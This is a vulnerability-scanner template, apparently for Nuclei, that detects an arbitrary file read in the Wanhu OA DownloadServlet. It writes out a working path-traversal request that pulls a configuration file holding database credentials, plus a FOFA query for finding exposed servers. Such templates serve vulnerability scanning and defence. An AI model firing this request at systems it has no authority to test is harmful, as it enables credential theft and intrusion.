id: wanhuoa-downloadservlet-lfi

info:
  name: Wanhu OA DownloadServlet - Remote File Disclosure
  author: wpsec
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the Wanhu OA DownloadServlet interface. An attacker can use the vulnerability to read sensitive files in the server and obtain sensitive information.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20DownloadServlet%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="万户网络-ezOFFICE"
  tags: oa,wanhu,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body,'ccerp.password')"
          - "contains(header,'application/x-msdownload')"
        condition: and
# digest: 490a00463044022023f900148f184a1841f80b416631f69daa7f48c95eb810ee86e8a2665b5970a802203f3e5c98f906d1711ef1b1c903c544b5d031cc7e45742790034c0cd4aca95e6e:922c64590222798bb761d5b6d8e72950